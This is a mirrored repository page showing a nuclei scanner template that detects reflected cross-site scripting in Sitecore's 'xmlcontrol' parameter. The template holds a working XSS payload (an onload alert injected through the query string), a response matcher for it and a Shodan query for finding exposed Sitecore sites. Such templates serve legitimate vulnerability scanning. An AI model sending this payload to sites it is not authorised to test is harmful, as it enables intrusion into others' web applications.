admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-09 12:13:30 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
c87966731dbb0fb2b685818a2d43765a94de70d8
nuclei-templates/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml
GitHub Action b38e8bbebc TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] 🤖
2023-10-20 11:41:16 +00:00

40 lines
1.1 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
id: sitecore-xml-xss
info:
name: SiteCore XML Control Script Insertion
author: DhiyaneshDK
severity: medium
description: |
Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack more can be achieved with these XML Controls
reference: |
- https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273
- https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded
metadata:
verified: "true"
max-request: 1
shodan-query: html:"Sitecore"
tags: xss,sitecore,cms
http:
- method: GET
path:
- "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<body onload=alert(document.domain) />"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022050a33d1e8d168b7a9ba886b1f58923cc292c3a53bc0d5c3eab7fa010ac80a5a4022100c2f3d55ef7064d8b24c06eecf38ee7308b5f5d8c5b18284c03fca9553631f311:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink